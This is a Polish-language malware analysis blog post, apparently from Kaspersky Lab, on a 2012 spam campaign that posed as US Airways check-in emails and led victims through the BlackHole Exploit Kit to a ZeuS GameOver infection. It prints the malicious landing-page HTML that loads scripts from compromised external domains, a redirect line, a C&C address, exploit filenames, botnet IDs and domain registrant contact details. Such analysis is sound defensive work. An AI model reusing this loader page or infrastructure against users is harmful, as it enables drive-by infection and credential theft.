Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Prezent od ZeuSa dla pasażerów US Airways

Dmitrij Tarakanow
Kaspersky Lab Expert
Dodany 5 kwietnia 2012, 10:45 CEST
Tagi:

Spam

20 marca wykryliśmy kampanię spamową, której celem byli pasażerowie US Airways. Prawie przez cały tydzień cyberprzestępcy wysyłali użytkownikom następujący e-mail, rzekomo pochodzący od US Airways:

Wiadomość zawiera krótki opis procedury odprawy oraz numer potwierdzenia rezerwacji online.

Cyberprzestępcy najwyraźniej liczą na to, że odbiorcy wiadomości, którzy rzeczywiście lecą wspomnianym lotem, klikną odsyłacz „Online reservation details” (szczegóły dotyczące rezerwacji online).

Różne e-maile zawierały różne odsyłacze – przykładowe domeny obejmowały: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.

Po kliknięciu odsyłacza, w wyniku serii przekierowań, użytkownik ostatecznie trafia na domenę hostującą BlackHole Exploit Kit.

BlackHole Exploit Kit: przekierowania i infekcja

W celu zainfekowania komputerów użytkownika stosowana jest typowa procedura infekcji BlackHole:

Po kliknięciu odsyłacza w e-mailu użytkownik trafia najpierw na stronę o następującym kodzie html:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://boemelparty.be/<removed>/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/<removed>/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/<removed>/js.js"></script>
</html>

W efekcie, do przeglądarki użytkownika ładowane są skrypty Java z różnych domen.
Zawierają one jedno polecenie takie jak:
document.location='http://indigocellular.com/'. Polecenie to przekierowuje użytkownika na stronę zawierającą kolejny zaciemniony skrypt Java.

Zadaniem tego skryptu jest umieszczanie odsyłaczy w kodzie html strony, które następnie prowadzą do obiektu z exploietm. Jak dotąd wykryliśmy trzy typy obiektów: plik JAR, plik SWF oraz dokument PDF. Każdy obiekt wykorzystuje lukę w odpowiedniej aplikacji - Java, Flash Player lub Adobe Reader – w celu wykonania szkodliwego kodu w atakowanym systemie. Wystarczy, że wykorzystywana jest dziurawa wersja tylko jednej z tych aplikacji, aby atak skończył się infekcją - szkodliwy kod wykonywalny zostaje załadowany i uruchomiony w systemie użytkownika.

Szkodliwe dokumenty JAR, SWF oraz PDF są ładowane z różnych domen – np. indigocellular.com, browncellular.com, bronzecellular.com (domains info) – pod nazwami Qai.jar, field.swf, dea86.pdf, 11591.pdf.

Wykrywamy te exploity jako:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof

Po skutecznym wykorzystaniu luk w zabezpieczeniach plik wykonywalny jest pobierany z tych samych domen, na których zlokalizowane są exploity. Może być pobierany pod różnymi nazwami - about.exe, contacts.exe oraz innymi – i zasadniczo stanowi downloadera.

Po uruchomieniu downloader łączy się ze swoim serwerem C&C pod adresem “176.28.18.135/pony/gate.php”, a następnie pobiera i uruchamia w systemie użytkownika kolejny szkodliwy program – ZeuS/ZBot, a dokładnie modyfikację jednej z gałęzi rozwoju tego trojana znanej jako „GameOver”.

ZeuS jest pobierany ze zhakowanych stron, takich jak:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com

Polimorfizm

Na wszystkich etapach tego ataku każdy obiekt – domeny, odsyłacze do skryptów Java, pliki z exploitami, downloader oraz ZeuS – był często zastępowany nowym. Domeny pozostawały aktywne przez prawie 12 godzin, ale próbki ZeuSa były wymieniane częściej.

W ciągu krótkiego czasu (kilka godzin przez kilka dni), w którym monitorowałem, jakie pliki były pobierane, udało mi się wykryć 6 modyfikacji tego downloadera oraz 3 modyfikacje ZeuSa.

Podsumowując, modyfikacja obejmuje wszystkie próbki wykrywane z tym samym werdyktem, dlatego liczba wykrytych programów jest zazwyczaj większa niż liczba werdyktów.

Werdykty downloadera:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams

Łączna liczba programów wykrytych z tymi werdyktami: 250.

Werdykty ZeuSa:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx

Łączna liczba próbek wykrytych z tymi werdyktami: 127.

Jak już wspominałem, są to jedynie werdykty, które zdołałem zarejestrować. W ciągu całej omawianej kampanii spamowej z pewnością pojawiło się więcej modyfikacji.

Identyfikatory botnetu

Zmieniało się nie tylko opakowanie ZeuSa (paker, obejście emulacji) - również sam szkodnik był ponownie kompilowany. ZeuS zawiera zakodowany na sztywno ciąg ID botnetu oraz niektóre adresy IP, z którymi szkodliwy program próbuje połączyć się po infekcji. Również te dane były z czasem modyfikowane. Na podstawie liczby wykrytych i przeanalizowanych próbek możemy założyć, że ZeuS był ponownie kompilowany przy co drugim przepakowywaniu.

Po przeanalizowaniu 48 wersji różnych modyfikacji ZeuSa wykorzystanych przez cyberprzestępców w tym ataku odkryłem 19 unikatowych identyfikatorów botnetu:

chinz22chinz24blk25mmz22mmz24mmz25
molotz25NR22NR23NR24NR25ppcz22
ppcz23ppcz24rnato25rubz22rubz23rubz24
zuu

W przeciwieństwie do konwencjonalnego programu ZeuS, który zwykle zawiera jeden adres URL w celu pobierania pliku konfiguracyjnego, każda próbka GameOver posiada 20 zakodowanych na sztywno adresów IP z portami. Po zainfekowaniu komputera ofiary GameOver próbuje ustanowić połączenie z tymi adresami, aby poinformować botnet o swoim istnieniu, uzyskiwać informacje oraz wysyłać dane skradzione ofierze.

Spośród 960 adresów IP zawartych w 48 analizowanych próbkach jedynie 157 jest unikatowych: +Otwórz listę adresów IP

Geografia ataku

Przypuszczam, że w omawianym czasie wiadomości spamowe z odsyłaczami umożliwiającymi potwierdzenie rezerwacji lotu liniami US Airways nie stanowiły jedynej metody rozprzestrzeniania ZeuSa. Chociaż nie jest to pierwszy raz, gdy cyberprzestępcy wykorzystali do swoich oszustw linie lotnicze, ten konkretny rodzaj spamu został wykryty po raz pierwszy. Jeżeli odbiorcy omawianej wiadomości spamowej rzeczywiście zarezerwowali bilety linii Airways, prawdopodobieństwo kliknięcia przez nich zawartego w wiadomości odsyłacza wzrastało. Jednak większość użytkowników, którzy otrzymali takie e-maile, nigdzie nie leciało tego dnia, dlatego bardzo mało osób dało się nabrać na to oszustwo.

Naturalnie, w analizowanym okresie wysyłane były również inne wiadomości spamowe, które zawierały odsyłacze prowadzące do wspomnianych wyżej stron, wspomniane exploity oraz szkodliwe pliki. Zbadałem, gdzie nasi użytkownicy wykrywali zagrożenia, które w ten czy inny sposób były związane z atakiem. Poniżej znajduje się rozkład geograficzny wykrytych exploitów, downloaderów oraz modyfikacji ZeuSa wykorzystywanych przez cyberprzestępców w ataku:

Rosja32,8%
Stany Zjednoczone10,3%
Włochy9,2%
Niemcy8,6%
Indie6,9%
Francja3,8%
Ukraina3,6%
Polska3,2%
Brazylia3,1%
Malezja3%
Hiszpania2,9%
Chiny2,7%

P.S. Poniżej informacje dotyczące domen wykorzystywanych w opisanej wyżej kampanii spamowej
(nie jest to pierwszy raz, gdy te dane zostały wykorzystane do zarejestrowania innych domen uczestniczących w rozprzestrzenianiu szkodliwego oprogramowania za pośrednictwem spamu):

indigocellular.com209.59.218.102
Rejestrujący:Nicholas Guzzardi, clarelam@primasia.com
5536 Gold Rush Dr.NW
87120 Albuquerque
United States
Tel: +1.5053505497
browncellular.com174.140.168.207
Rejestrujący:Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US
bronzecellular.com96.9.151.220
Rejestrujący:Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US

Poniżej znajdują się hashe MD5 plików +Otwórz listę sum kontrolnych MD5